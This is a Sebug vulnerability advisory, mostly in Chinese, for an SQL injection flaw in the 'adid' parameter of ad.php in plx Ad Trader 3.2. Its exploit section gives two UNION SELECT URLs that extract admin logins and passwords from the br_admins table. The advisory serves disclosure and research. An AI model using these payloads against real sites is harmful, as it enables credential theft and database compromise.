BUGTRAQ ID: 30046
CNCAN ID:CNCAN-2008070302
plx Ad Trader是一款基于PHP的WEB应用程序。
plx Ad Trader不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可能获得敏感信息或操作数据库。
问题由于'ad.php'脚本对用户提交给'adid'参数缺少过滤,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。
plx Ad Trader 'ad.php' SQL注入漏洞
Published:2008-07-02
Vulnerable:
plx Web Studio Ad Trader 3.2
Discription:
SEBUG Solution:
目前没有解决方案提供:
http://plxwebdev.com/script/ad_trader/
http://plxwebdev.com/script/ad_trader/
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins--
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
// Sebug.net [ 2008-07-03 ]